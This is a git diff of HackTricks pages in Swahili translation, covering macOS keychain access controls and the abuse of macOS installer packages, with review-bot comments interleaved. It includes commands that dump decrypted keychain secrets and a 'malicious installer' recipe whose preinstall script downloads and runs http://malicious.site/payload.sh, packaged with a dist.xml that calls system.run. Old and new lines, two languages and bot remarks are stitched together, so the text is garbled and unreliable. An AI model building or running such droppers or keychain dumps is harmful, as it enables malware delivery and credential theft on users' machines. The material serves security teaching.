Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila ya wazi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua.
Faili hizi, ingawa hazina ulinzi wa ndani na zinaweza **downloaded**, zimefungwa na zinahitaji **nywila ya mtumiaji ya maandiko ili kufunguliwa**. Chombo kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) kinaweza kutumika kwa ajili ya ufunguo.
## Kinga ya Viingilio vya Keychain
## Keychain Entries Protections
### ACLs
Kila kuingilio katika keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (ACLs)** ambazo zinaamua ni nani anaweza kutekeleza vitendo mbalimbali kwenye kuingilio cha keychain, ikiwa ni pamoja na:
Kila ingizo katika keychain linaongozwa na **Access Control Lists (ACLs)** ambazo zinaelekeza nani anaweza kufanya vitendo mbalimbali kwenye ingizo la keychain, ikiwa ni pamoja na:
* **ACLAuhtorizationExportClear**: Inaruhusu mmiliki kupata maandishi wazi ya siri.
* **ACLAuhtorizationExportWrapped**: Inaruhusu mmiliki kupata maandishi wazi yaliyofichwa na nywila nyingine iliyotolewa.
* **ACLAuhtorizationAny**: Inaruhusu mmiliki kutekeleza kitendo chochote.
* **ACLAuhtorizationExportClear**: Inaruhusu mwenyewe kupata maandiko ya siri.
* **ACLAuhtorizationExportWrapped**: Inaruhusu mwenyewe kupata maandiko ya wazi yaliyofichwa kwa nywila nyingine iliyotolewa.
* **ACLAuhtorizationAny**: Inaruhusu mwenyewe kufanya kitendo chochote.
ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kutekeleza vitendo hivi bila kuulizwa. Hii inaweza kuwa:
ACLs zinakuja na **orodha ya programu zinazotegemewa** ambazo zinaweza kufanya vitendo hivi bila kuombwa. Hii inaweza kuwa:
* **N`il`** (hakuna idhini inayohitajika, **kila mtu anaaminika**)
* Orodha **tupu** (**hakuna mtu** anaaminika)
* **Orodha** ya **programu maalum**.
* **N`il`** (hakuna idhini inayohitajika, **kila mtu anategemewa**)
* Orodha **tyupu** (**hakuna mtu** anategemewa)
* **Orodha** ya **programu** maalum.
Pia kuingilio kinaweza kuwa na funguo **`ACLAuthorizationPartitionID`,** ambayo hutumiwa kutambua **teamid, apple,** na **cdhash.**
Pia ingizo linaweza kuwa na funguo **`ACLAuthorizationPartitionID`,** ambayo inatumika kutambua **teamid, apple,** na **cdhash.**
* Ikiwa **teamid** imetajwa, basi ili **kupata thamani ya kuingilio** bila **kuuliza**, programu iliyotumika lazima iwe na **teamid sawa**.
* Ikiwa **apple** imetajwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**.
* Ikiwa **cdhash** imeonyeshwa, basi **programu** lazima iwe na **cdhash** maalum.
* Ikiwa **teamid** imeainishwa, basi ili **kupata thamani ya ingizo** **bila** **kuombwa** programu iliyotumika lazima iwe na **teamid sawa**.
* Ikiwa **apple** imeainishwa, basi programu inahitaji kuwa **imedhaminiwa** na **Apple**.
* Ikiwa **cdhash** imeainishwa, basi **programu** lazima iwe na **cdhash** maalum.
### Kuunda Kuingilio cha Keychain
### Creating a Keychain Entry
Wakati kuingilio **mpya** kinachoundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
Wakati **ingizo jipya** linaundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
* Programu zote zinaweza kufanya usimbaji.
* **Hakuna programu** inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **PartitionID** inawekwa kuwa **`apple`**.
* Programu zote zinaweza kuficha.
* **Hakuna programu** zinaweza kusafirisha/kufungua (bila kuombwa mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uaminifu.
* Hakuna programu zinaweza kubadilisha ACLs.
* **partitionID** imewekwa kuwa **`apple`**.
Wakati **programu inaunda kuingilio katika keychain**, sheria ni tofauti kidogo:
Wakati **programu inaunda ingizo katika keychain**, sheria ni tofauti kidogo:
* Programu zote zinaweza kufanya usimbaji.
* Ni **programu inayounda** (au programu nyingine yoyote iliyowekwa wazi) inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **PartitionID** inawekwa kuwa **`teamid:[teamID hapa]`**.
* Programu zote zinaweza kuficha.
* Ni **programu inayounda** pekee (au programu nyingine yoyote iliyoongezwa wazi) zinaweza kusafirisha/kufungua (bila kuombwa mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uaminifu.
* Hakuna programu zinaweza kubadilisha ACLs.
* **partitionID** imewekwa kuwa **`teamid:[teamID hapa]`**.
## Kupata Ufikiaji wa Keychain
## Accessing the Keychain
### `usalama`
### `security`
```bash
# List keychains
security list-keychains
# Dump all metadata and decrypted secrets (a lot of pop-ups)
security dump-keychain -a -d
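Review bot: the User Keychain path `~/Library/Keychains/login.keycahin-db` is misspelled in both the old and new bullet; the correct `login.keychain-db` appears later in this same file in the `security dump-keychain` example, so the two should agree. The three ACL entries are spelled "ACLAuhtorizationExportClear", "ACLAuhtorizationExportWrapped" and "ACLAuhtorizationAny" while `ACLAuthorizationPartitionID` two paragraphs down is spelled correctly; the "Auht" transposition is carried over from the previous version and should be fixed when retranslating. Translation points: "tyupu" should be "tupu"; "Programu zote zinaweza kuficha" ("hide") replaces the previous "kufanya usimbaji" ("encrypt") and changes the meaning of the rule; and "nywila ya mtumiaji ya maandiko" does not convey "plaintext password", where the previous "nywila ya wazi" did.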
@ -90,60 +93,63 @@ security find-generic-password -a "Slack" -g
# Change the specified entrys PartitionID entry
security set-generic-password-parition-list -s "test service" -a "test acount" -S
# Dump specifically the user keychain
security dump-keychain ~/Library/Keychains/login.keychain-db
```
### APIs
{% hint style="success" %}
**Uorodheshaji na kudondosha** ya siri ambazo **hazitazalisha ombi** linaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
Utaratibu wa **keychain** na kutolewa kwa siri ambazo **hazitazalisha ujumbe** zinaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
{% endhint %}
Pata na ujue **taarifa** kuhusu kila kuingia kwenye keychain:
Orodhesha na pata **info** kuhusu kila kiingilio cha keychain:
* API ya **`SecItemCopyMatching`** hutoa taarifa kuhusu kila kuingia na kuna sifa unazoweza kuweka unapotumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kama uongo ili kuepuka pop-ups)
* **`kSecReturnRef`**: Pata pia kumbukumbu ya kipengee cha keychain (weka kama kweli kwa kesi utaona unaweza kufichua bila pop-up)
* **`kSecReturnAttributes`**: Pata maelezo kuhusu kuingia
* **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudi
* **`kSecClass`**: Aina gani ya kuingia kwenye keychain
* API **`SecItemCopyMatching`** inatoa info kuhusu kila kiingilio na kuna baadhi ya sifa unaweza kuweka unapoitumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufungua data (weka kuwa uongo ili kuepuka pop-up zinazoweza kutokea)
* **`kSecReturnRef`**: Pata pia rejea kwa kipengee cha keychain (weka kuwa kweli ikiwa baadaye utaona unaweza kufungua bila pop-up)
* **`kSecReturnAttributes`**: Pata metadata kuhusu viingilio
* **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudisha
* **`kSecClass`**: Ni aina gani ya kiingilio cha keychain
Pata **ACLs** ya kila kuingia:
Pata **ACLs** za kila kiingilio:
* Kwa API ya **`SecAccessCopyACLList`** unaweza kupata **ACL ya kipengee cha keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa awali) ambapo kila orodha ina:
* Kwa API **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kipengee cha keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na wengine waliotajwa hapo awali) ambapo kila orodha ina:
* Maelezo
* **Orodha ya Maombi Yaliyoaminika**. Hii inaweza kuwa:
* **Orodha ya Maombi ya Kuaminika**. Hii inaweza kuwa:
* Programu: /Applications/Slack.app
* Binary: /usr/libexec/airportd
* Kikundi: group://AirPort
* Kundi: group://AirPort
Ficha data:
Sambaza data:
* API ya **`SecKeychainItemCopyContent`** inapata maandishi wazi
* API ya **`SecItemExport`** inaexport funguo na vyeti lakini inaweza kuhitaji kuweka nywila kuuza yaliyomo yaliyofichwa
* API **`SecKeychainItemCopyContent`** inapata maandiko
* API **`SecItemExport`** inasambaza funguo na vyeti lakini inaweza kuhitaji kuweka nywila ili kusambaza yaliyomo kwa usimbuaji
Na hizi ni **mahitaji** ya kuweza **kuuza siri bila ombi**:
Na haya ndiyo **mahitaji** ya kuwa na uwezo wa **kusambaza siri bila ujumbe**:
* Ikiwa kuna **programu 1 au zaidi** zilizoorodheshwa:
* Unahitaji **idhini sahihi** (**`Nil`**, au kuwa **sehemu** ya orodha iliyoruhusiwa ya programu katika idhini ya kupata taarifa za siri)
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Unahitaji sahihi ya msimbo kulingana na ile ya programu moja **iliyoaminika** (au kuwa mwanachama wa KeychainAccessGroup sahihi)
* Ikiwa **programu zote zinaaminika**:
* Unahitaji **idhini sahihi**
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Ikiwa **hakuna PartitionID**, basi hii haifai
* Ikiwa **1+ maombi ya kuaminika** yameorodheshwa:
* Inahitaji **idhini** sahihi (**`Nil`**, au kuwa **sehemu** ya orodha inayoruhusiwa ya maombi katika idhini ya kufikia info ya siri)
* Inahitaji saini ya msimbo kuendana na **PartitionID**
* Inahitaji saini ya msimbo kuendana na ile ya **programu moja ya kuaminika** (au kuwa mwanachama wa kundi sahihi la KeychainAccessGroup)
* Ikiwa **maombi yote ni ya kuaminika**:
* Inahitaji **idhini** sahihi
* Inahitaji saini ya msimbo kuendana na **PartitionID**
* Ikiwa **hakuna PartitionID**, basi hii haitahitajika
{% hint style="danger" %}
Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo kwenye programu hiyo**.
Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo katika programu hiyo**.
Ikiwa **apple** imeonyeshwa kwenye **partitionID**, unaweza kufikia hiyo kwa kutumia **`osascript`** hivyo chochote kinachotumaini programu zote na apple kwenye partitionID. **`Python`** pia inaweza kutumika kwa hili.
Ikiwa **apple** inaonyeshwa katika **partitionID**, unaweza kuipata kwa kutumia **`osascript`** hivyo chochote kinachotegemea maombi yote na apple katika partitionID. **`Python`** inaweza pia kutumika kwa hili.
{% endhint %}
### Vipengele viwili vya ziada
### Sifa mbili za ziada
* **Isiyoweza kuonekana**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwa programu ya Keychain ya **UI**
* **Jumla**: Ni kuhifadhi **metadata** (kwa hivyo SIYOFICHWA)
* Microsoft ilikuwa inahifadhi katika maandishi wazi vivinjari vyote vya upya kufikia mwisho wa hisia.
* **Invisible**: Ni bendera ya boolean ili **kuficha** kiingilio kutoka kwa programu ya **UI** Keychain
* **General**: Ni kuhifadhi **metadata** (hivyo HAIJASIMBULIWA)
* Microsoft ilikuwa ikihifadhi katika maandiko yote ya refresh tokens ili kufikia mwisho wa nyeti.
## Marejeo
## Marejeleo
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
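Review bot: the unchanged context line `security set-generic-password-parition-list -s "test service" -a "test acount" -S` misspells the subcommand (it is `set-generic-password-partition-list`), so the command fails as written; fix it and the "acount" typo while this hunk is open. Two smaller points in the same region: `ACLAuhtorizationExportClear` has transposed letters (the Security framework constant is spelled "Authorization"), and the lead-ins "Ficha data:" / "Sambaza data:" say hide/distribute where the APIs listed under them (`SecKeychainItemCopyContent`, `SecItemExport`) decrypt and export, so "Simbua data:" would match the content.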
@ -151,25 +157,25 @@ Ikiwa **apple** imeonyeshwa kwenye **partitionID**, unaweza kufikia hiyo kwa kut
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utafutaji inayotumiwa na **dark-web** inayotoa kazi za **bure** kuangalia ikiwa kampuni au wateja wake wamekuwa **wameathiriwa** na **stealer malwares**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo lao kuu la WhiteIntel ni kupambana na kuchukuliwa kwa akaunti na mashambulizi ya ransomware yanayotokana na malware ya kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
Unaweza kuangalia tovuti yao na kujaribu injini yao kwa **bure** kwenye:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
Jifunze & zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>unga mkono HackTricks</summary>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,35 +1,37 @@
# Matumizi Mabaya ya Wasakinishaji wa macOS
# macOS Installers Abuse
{% hint style="success" %}
Jifunze na zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>unga mkono HackTricks</summary>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi za Pkg
## Pkg Basic Information
**Pakiti ya wasakinishaji wa macOS** (inayojulikana pia kama faili ya `.pkg`) ni muundo wa faili unaotumiwa na macOS kwa **kugawa programu**. Faili hizi ni kama **sanduku linaloleta kila kitu ambacho programu** inahitaji kusakinisha na kukimbia kwa usahihi.
Kifurushi cha **installer** cha macOS (pia kinachojulikana kama faili `.pkg`) ni muundo wa faili unaotumiwa na macOS ku **distribute software**. Faili hizi ni kama **sanduku ambalo lina kila kitu ambacho kipande cha software** kinahitaji ili kufunga na kufanya kazi ipasavyo.
Faili ya pakiti yenyewe ni nyaraka inayoshikilia **mfululizo wa faili na saraka ambazo zitasakinishwa kwenye** kompyuta ya lengo. Inaweza pia kujumuisha **maandishi** kutekeleza kazi kabla na baada ya usakinishaji, kama vile kuweka faili za usanidi au kusafisha toleo za zamani za programu.
Faili la kifurushi lenyewe ni archive inayoshikilia **hierarchy ya faili na directories ambazo zitawekwa kwenye kompyuta ya lengo**. Inaweza pia kujumuisha **scripts** za kutekeleza kazi kabla na baada ya ufungaji, kama vile kuandaa faili za usanidi au kusafisha toleo za zamani za software.
### Mfululizo
### Hierarchy
<figure><img src="../../../.gitbook/assets/Pasted Graphic.png" alt="https://www.youtube.com/watch?v=iASSG0_zobQ"><figcaption></figcaption></figure>
* **Usambazaji (xml)**: Kubinafsisha (jina, maandishi ya karibu...) na maandishi/uchunguzi wa usakinishaji
* **PackageInfo (xml)**: Taarifa, mahitaji ya usakinishaji, mahali pa usakinishaji, njia za maandishi za kukimbia
* **Bili ya vifaa (bom)**: Orodha ya faili za kusakinisha, kuboresha au kuondoa na ruhusa za faili
* **Mzigo (CPIO nyaraka gzip compresses)**: Faili za kusakinisha kwenye `mahali-pa-usakinishaji` kutoka PackageInfo
* **Maandishi (CPIO nyaraka gzip compresses)**: Maandishi kabla na baada ya usakinishaji na rasilimali zaidi zilizochimbuliwa kwenye saraka ya muda kwa utekelezaji.
* **Distribution (xml)**: Marekebisho (kichwa, maandiko ya karibisho…) na ukaguzi wa script/ufungaji
* **PackageInfo (xml)**: Taarifa, mahitaji ya ufungaji, eneo la ufungaji, njia za scripts za kutekeleza
* **Bill of materials (bom)**: Orodha ya faili za kufunga, kuboresha au kuondoa pamoja na ruhusa za faili
* **Payload (CPIO archive gzip compresses)**: Faili za kufunga katika `install-location` kutoka PackageInfo
* **Scripts (CPIO archive gzip compressed)**: Scripts za kabla na baada ya ufungaji na rasilimali zaidi zilizotolewa kwenye directory ya muda kwa ajili ya utekelezaji.
### Decompress
```bash
# Tool to directly get the files inside a package
pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir"
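Review bot: the Decompress context line `pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir"` uses a typographic em dash instead of two hyphens, so pkgutil rejects the option; it should read `pkgutil --expand "/path/to/package.pkg" "/path/to/out/dir"`. Also, the new "Payload" bullet keeps "gzip compresses" while the "Scripts" bullet directly below it says "gzip compressed"; make both "compressed".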
@ -43,60 +45,143 @@ xar -xf "/path/to/package.pkg"
cat Scripts | gzip -dc | cpio -i
cpio -i < Scripts
```
## Maelezo Muhimu ya DMG
In order to visualize the contents of the installer without decompressing it manually you can also use the free tool [**Suspicious Package**](https://mothersruin.com/software/SuspiciousPackage/).
Faili za DMG, au Picha za Diski za Apple, ni muundo wa faili unaotumiwa na macOS ya Apple kwa picha za diski. Faili ya DMG ni msingi wa **picha ya diski inayoweza kufungwa** (ina filesystem yake) ambayo ina data ya block ya ghafi mara nyingi imepakwa na wakati mwingine imefichwa. Unapofungua faili ya DMG, macOS **inaifunga kama vile ingekuwa diski halisi**, kuruhusu kupata yaliyomo yake.
## DMG Basic Information
DMG files, or Apple Disk Images, are a file format used by Apple's macOS for disk images. A DMG file is essentially a **mountable disk image** (it contains its own filesystem) that contains raw block data typically compressed and sometimes encrypted. When you open a DMG file, macOS **mounts it as if it were a physical disk**, allowing you to access its contents.
{% hint style="danger" %}
Tafadhali kumbuka kwamba wasakinishaji wa **`.dmg`** hushikilia **muundo mwingi sana** ambao hapo awali baadhi yao waliokuwa na mapungufu walitumika kupata **utekelezaji wa nambari ya msingi**.
Note that **`.dmg`** installers support **so many formats** that in the past some of them containing vulnerabilities were abused to obtain **kernel code execution**.
{% endhint %}
### Mfumo wa Hierarchy
### Hierarchy
<figure><img src="../../../.gitbook/assets/image (225).png" alt=""><figcaption></figcaption></figure>
Mfumo wa faili ya DMG unaweza kutofautiana kulingana na yaliyomo. Hata hivyo, kwa DMGs za programu, kawaida inafuata muundo huu:
The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure:
* Kiwango cha Juu: Hii ni mzizi wa picha ya diski. Mara nyingi ina programu na labda kiungo kwa folda za Maombi.
* Programu (.app): Hii ni programu halisi. Katika macOS, programu ni kawaida pakiti inayojumuisha faili na folda nyingi zinazounda programu.
* Kiungo cha Maombi: Hii ni mkato kwenda kwa folda za Maombi kwenye macOS. Lengo la hili ni kufanya iwe rahisi kwako kusakinisha programu. Unaweza kuburuta faili ya .app kwenye mkato huu kusakinisha programu.
* Top Level: This is the root of the disk image. It often contains the application and possibly a link to the Applications folder.
* Application (.app): This is the actual application. In macOS, an application is typically a package that contains many individual files and folders that make up the application.
* Applications Link: This is a shortcut to the Applications folder in macOS. The purpose of this is to make it easy for you to install the application. You can drag the .app file to this shortcut to install the app.
## Privesc kupitia unyanyasaji wa pkg
## Privesc via pkg abuse
### Utekelezaji kutoka kwenye folda za umma
### Execution from public directories
Ikiwa scripti ya usakinishaji kabla au baada ya usakinishaji inatekelezwa kwa mfano kutoka **`/var/tmp/Installerutil`**, na mshambuliaji anaweza kudhibiti scripti hiyo ili apande vyeo kila wakati inapotekelezwa. Au mfano mwingine sawa:
If a pre or post installation script is for example executing from **`/var/tmp/Installerutil`**, and attacker could control that script so he escalate privileges whenever it's executed. Or another similar example:
<figure><img src="../../../.gitbook/assets/Pasted Graphic 5.png" alt="https://www.youtube.com/watch?v=iASSG0_zobQ"><figcaption><p><a href="https://www.youtube.com/watch?v=kCXhIYtODBg">https://www.youtube.com/watch?v=kCXhIYtODBg</a></p></figcaption></figure>
### AuthorizationExecuteWithPrivileges
Hii ni [kazi ya umma](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) ambayo wasakinishaji na wakusasisha kadhaa watatumia kutekeleza kitu kama mzizi. Kazi hii inakubali **njia** ya **faili** ya **kutekeleza** kama parameter, hata hivyo, ikiwa mshambuliaji anaweza **kurekebisha** faili hii, ataweza **kunyanyasa** utekelezaji wake na mzizi ili **kupandisha vyeo**.
This is a [public function](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) that several installers and updaters will call to **execute something as root**. This function accepts the **path** of the **file** to **execute** as parameter, however, if an attacker could **modify** this file, he will be able to **abuse** its execution with root to **escalate privileges**.
```bash
# Breakpoint in the function to check wich file is loaded
(lldb) b AuthorizationExecuteWithPrivileges
# You could also check FS events to find this missconfig
```
### Utekelezaji kwa kufunga
For more info check this talk: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw)
Ikiwa mtengenezaji anaandika kwa `/tmp/fixedname/bla/bla`, inawezekana **kuunda mlima** juu ya `/tmp/fixedname` bila wamiliki hivyo unaweza **kurekebisha faili yoyote wakati wa usakinishaji** kwa kudhuru mchakato wa usakinishaji.
### Utekelezaji kwa kupandisha
Mfano wa hii ni **CVE-2021-26089** ambayo ilifanikiwa **kubadilisha skripti ya kipindi** ili kupata utekelezaji kama mtumiaji wa mizizi. Kwa maelezo zaidi angalia mazungumzo: [**OBTS v4.0: "Mlima wa Mende" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
Ikiwa mfunguo anaandika kwenye `/tmp/fixedname/bla/bla`, inawezekana **kuunda mount** juu ya `/tmp/fixedname` bila wamiliki ili uweze **kubadilisha faili yoyote wakati wa ufungaji** ili kutumia mchakato wa ufungaji.
## pkg kama zisizo
Mfano wa hili ni **CVE-2021-26089** ambayo ilifanikiwa **kufuta script ya kawaida** ili kupata utekelezaji kama root. Kwa maelezo zaidi angalia hotuba: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
### Mzigo wa Kufuta
## pkg kama malware
Inawezekana tu kuzalisha faili ya **`.pkg`** na **skripti za kabla na baada ya usakinishaji** bila mzigo wowote.
### Payload Tupu
### JS katika xml ya Usambazaji
Inawezekana tu kuunda **`.pkg`** faili yenye **pre na post-install scripts** bila payload halisi isipokuwa malware ndani ya scripts.
Inawezekana kuongeza vitambulisho vya **`<script>`** katika faili ya **xml ya usambazaji** ya pakiti na msimbo huo utatekelezwa na inaweza **kutekeleza amri** kutumia **`system.run`**:
### JS katika distribution xml
Inawezekana kuongeza **`<script>`** vitambulisho katika **distribution xml** faili ya kifurushi na hiyo code itatekelezwa na inaweza **kutekeleza amri** kwa kutumia **`system.run`**:
<figure><img src="../../../.gitbook/assets/image (1043).png" alt=""><figcaption></figcaption></figure>
## Marejeo
### Mfunguo wa nyuma
* [**DEF CON 27 - Kufungua Pkgs Tazama Ndani ya Pakiti za Usakinishaji wa MacOS na Uvimbe wa Kawaida wa Usalama**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**OBTS v4.0: "Dunia ya Kufunga ya macOS" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
* [**DEF CON 27 - Kufungua Pkgs Tazama Ndani ya Pakiti za Usakinishaji wa MacOS**](https://www.youtube.com/watch?v=kCXhIYtODBg)
Mfunguo mbaya ukitumia script na JS code ndani ya dist.xml
```bash
# Package structure
mkdir -p pkgroot/root/Applications/MyApp
mkdir -p pkgroot/scripts
# Create preinstall scripts
cat > pkgroot/scripts/preinstall <<EOF
#!/bin/bash
echo "Running preinstall script"
curl -o /tmp/payload.sh http://malicious.site/payload.sh
chmod +x /tmp/payload.sh
/tmp/payload.sh
exit 0
EOF
# Build package
pkgbuild --root pkgroot/root --scripts pkgroot/scripts --identifier com.malicious.myapp --version 1.0 myapp.pkg
# Generate the malicious dist.xml
cat > ./dist.xml <<EOF
<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
<title>Malicious Installer</title>
<options customize="allow" require-scripts="false"/>
<script>
<![CDATA[
function installationCheck() {
if (system.isSandboxed()) {
my.result.title = "Cannot install in a sandbox.";
my.result.message = "Please run this installer outside of a sandbox.";
return false;
}
return true;
}
function volumeCheck() {
return true;
}
function preflight() {
system.run("/path/to/preinstall");
}
function postflight() {
system.run("/path/to/postinstall");
}
]]>
</script>
<choices-outline>
<line choice="default">
<line choice="myapp"/>
</line>
</choices-outline>
<choice id="myapp" title="MyApp">
<pkg-ref id="com.malicious.myapp"/>
</choice>
<pkg-ref id="com.malicious.myapp" installKBytes="0" auth="root">#myapp.pkg</pkg-ref>
</installer-gui-script>
EOF
# Buil final
productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg
```
## References
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**OBTS v4.0: "The Wild World of macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
* [**DEF CON 27 - Unpacking Pkgs A Look Inside MacOS Installer Packages**](https://www.youtube.com/watch?v=kCXhIYtODBg)
* [https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
